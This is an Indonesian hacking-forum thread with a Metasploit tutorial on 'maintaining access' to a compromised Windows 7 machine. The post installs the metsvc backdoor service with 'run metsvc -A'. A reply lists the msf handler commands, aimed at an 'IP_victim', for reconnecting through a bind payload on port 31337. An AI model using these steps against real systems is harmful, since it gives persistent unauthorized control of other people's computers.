Share Automatic backdoor running windows 7 ( Maintaining Access ) - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html) +--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html) +---- Forum: Metasploit (https://www.indonesianbacktrack.or.id/forum/forum-122.html) +---- Thread: Share Automatic backdoor running windows 7 ( Maintaining Access ) (/thread-4284.html) Pages:
1
2
|
Automatic backdoor running windows 7 ( Maintaining Access ) - zee eichel - 02-28-2013 Hmm buka email baru 3 hari juga udah puluhan email yang masuk. Pertama-tama saya mohon maaf kalo saya belum bisa membalas email teman-teman dari seluruh tanah air karena masih ada kesibukan sedikit. Saya melihat bahwa ada sekitar 30 – an email yang bertanya pada hal yang sama.. yaitu tentang gimana agar mempertahankan backdoor yang telah berhasil di masukan dan telah sukses menuai meterpreter shell. Sebenarnya mudah sekali. Ok saya mulai ya … temen2 yang telah mengirim email kepada saya dan pertanyaannya ginian baca disni saja ya … saya gk bisa reply email temen2 satu persatu. Ok anggaplah kita sudah mendapat meterpreter shell, gimana cara mempertahankan backdoor tersebut adalah kita harus mengupload sebuah backdoor baru yang akan terinstall kepada service local windows .. alias autorun pada saat sistem di reboot atau booting. Wah gimana caranya apakah langkahnya panjang ? .. tidak .. !! seperti yang saya bilang sebelumnya BackTrack di ciptakan sedemikian rupa untuk menjadi sebuah alat yang akan memudahkan temen2 .. Ok tampilan screenshot di atas menandakan kita sudah mendapatkan akses meterpreter pada port 666 ( LPORT ) dan alamat ip 192.168.2.2. Bagi temen-temen yang belum ngerti masalah dapetin akses meterpreter shell pada sistem target .. ubek2 blog ini atau bisa ke forum ane .. http://indonesianbacktrack.or.id sudah banyak kok di bahas .. Pada command prompt isikan perintah run metsvc –A . Ok meterpreter akan mengupload file dan membentuk service secara otomatis … weeess okey .com … hmm secara default perintah metsvc -A tadi akan membuka sebuah service reverse pada windows 7 dengan port secara default yaitu 31337 wuzzz dia akan segera membentuk sebuah sesi ( session ) baru .. What we do next ? Okey coba reboot sistem target dan buka console baru. Ini dapat anda lakukan tiap kali anda menginginkan untuk mengkonekan diri anda pada sistem target. Hmm jgn lupa tadi ane bilang bahwa perintah metsvc –A akan membentuk reverse karena itu kita butuh payload bind .. sip .. go on .. Pada console msf baru .. gunakan exploit/multi/handler dan set RHOST anda (IP-TARGET) kemudian gunakan payload metsvc bind ohh ,.. meterpreter langsung terbuka .. hmm hal ini kita tidak perlu capek2 lagi harus upload backdoor ato melakukan exploitasi lagi .. inilah yang dinamakan sesi maintaining access … Ok semoga berguna ya .. klo ada waktu ane posting videonya .. original post : http://zeestuff.wordpress.com/2013/02/27/automatic-backdoor-running-windows-7-maintaining-access/ RE: Automatic backdoor running windows 7 ( Maintaining Access ) - Minal Texass - 02-28-2013 wah dapat ilmu baru lagi nih trmkasih om zee eichel ilmu nya sangat berguna izin mempelajari RE: Automatic backdoor running windows 7 ( Maintaining Access ) - rjryukiee - 02-28-2013 wah dapet ilmu keren nih.. di coba dulu om zee makasih banyak dan sangat berguna >< RE: Automatic backdoor running windows 7 ( Maintaining Access ) - wahyuardan - 02-28-2013 keren om. ilmu baru ijin dplajari :-) RE: Automatic backdoor running windows 7 ( Maintaining Access ) - Elfnine-x3 - 02-28-2013 makasih om............ hehehhe RE: Automatic backdoor running windows 7 ( Maintaining Access ) - path - 02-28-2013 mantaaappp om zee, thanks.. RE: Automatic backdoor running windows 7 ( Maintaining Access ) - wine trochanter - 02-28-2013 wahh keren tp yg susah mah soceng si win 7 nya RE: Automatic backdoor running windows 7 ( Maintaining Access ) - blizter - 02-28-2013 tambahan dikit dari ane abis praktek . msf > use exploit/multi/handler msf > set payload windows/meterpreter/bind_tcp msf > set RHOST IP_victim msf > set LPORT 31337 msf > exploit dijamin shell meterpreter kebuka kalo udah ditanem metsvc server nya . CMIIW :- RE: Automatic backdoor running windows 7 ( Maintaining Access ) - blizter - 03-01-2013 nice (y) btw disini ada tutor pake nexpose ga ? RE: Automatic backdoor running windows 7 ( Maintaining Access ) - LAKIamat - 03-01-2013 mantep om, ijin dicoba om.. |